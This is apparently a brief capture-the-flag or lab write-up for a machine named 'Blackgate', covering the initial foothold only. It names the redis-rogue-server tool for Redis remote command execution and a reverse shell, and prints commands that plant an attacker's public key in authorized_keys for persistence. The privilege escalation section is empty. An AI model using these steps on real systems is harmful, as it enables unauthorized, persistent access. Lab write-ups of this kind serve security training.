Blackgate
Initial Foothold
After an initial nmap scan, the only services that were listening on the target host were SSH and Redis:
This version of Redis is vulnerable to remote command execution:

After utilzing the redis-rogue-server tool, we were able to achieve a reverse shell connection as the user prudence:

For persistence and to achieve a full shell, I created a new public/private key pair using ssh-keygen. I then created the file /home/prudence/.ssh/authorized_keys on the target host and added the newly created public key to that file:
prudence@blackgate:/tmp$ mkdir /home/prudence/.ssh
prudence@blackgate:/tmp$ echo "INSERT PUBLIC KEY HERE" > /home/prudence/.ssh/authorized_keys
After this, I was able to achieve an SSH session using the new identity file:
Privilege Escalation
Last updated